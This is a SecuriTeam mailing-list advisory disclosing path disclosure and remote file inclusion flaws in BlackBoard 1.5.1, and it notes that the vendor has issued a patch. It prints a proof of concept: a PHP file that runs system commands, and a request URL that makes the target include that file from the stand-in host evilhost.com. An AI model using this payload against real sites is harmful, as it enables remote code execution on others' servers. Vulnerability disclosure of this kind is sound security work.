The following security advisory is sent to the securiteam mailing list, and can
be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
BlackBoard Path Disclosure and File Inclusion Vulnerabilities
------------------------------------------------------------------------
SUMMARY
<http://blackboard.unclassified.de/> BlackBoard is "an open-source,
PHP-based internet bulletin board software, almost like any other around".
Two vulnerabilities have been discovered in BlackBoard, a path disclosure
vulnerability and a file inclusion vulnerability. Using the file inclusion
vulnerability it is possible to cause the remote site to execute arbitrary
code, using the path disclosure vulnerability it is possible to discover
the true path under which the product has been installed.
DETAILS
Vulnerable Systems:
* BlackBoard version 1.5.1
Path Disclosure:
By requesting the following file it is possible to retrieve the actual
path under which the BlackBoard product is installed:
http://target/bb_lib/checkdb.inc.php
The response would look like:
Warning: main(lang/_more.php): failed to open stream: No such file or
directory in /www/web002/_blackboard/bb_lib/checkdb.inc.php on line 15
Fatal error: main(): Failed opening required 'lang/_more.php'
(include_path='.:/usr/local/lib/php') in
/www/web002/_blackboard/bb_lib/checkdb.inc.php on line 15
The same issue also occurs in admin.inc.php, cp.inc.php and others.
File Inclusion:
The /bb_lib/admin.inc.php incorrectly uses the following unsensitized
require function call:
require($libpath . 'lang/' . $LANG . '_more.php');
Meaning anyone can replace the libpath parameter with whichever file they
desire causing the inclusion of arbitrary files.
Exploit:
Create a file called _more.php on your web site with the following
content:
<?
system("uname -a;id;ls -al");
?>
Then issue a request of the sorts of, to cause it to get included and
executed:
http://target/bb_lib/checkdb.inc.php?libpach=http://evilhost.com/
Vendor response:
The vendor has issued a patch that addresses this issues.
ADDITIONAL INFORMATION
The information has been provided by <mailto:Cracklove@gmail.com> Lin
Xiaofeng.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to:
list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to:
list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any
kind.
In no event shall we be liable for any damages whatsoever including direct,
indirect, incidental, consequential, loss of business profits or special
damages.
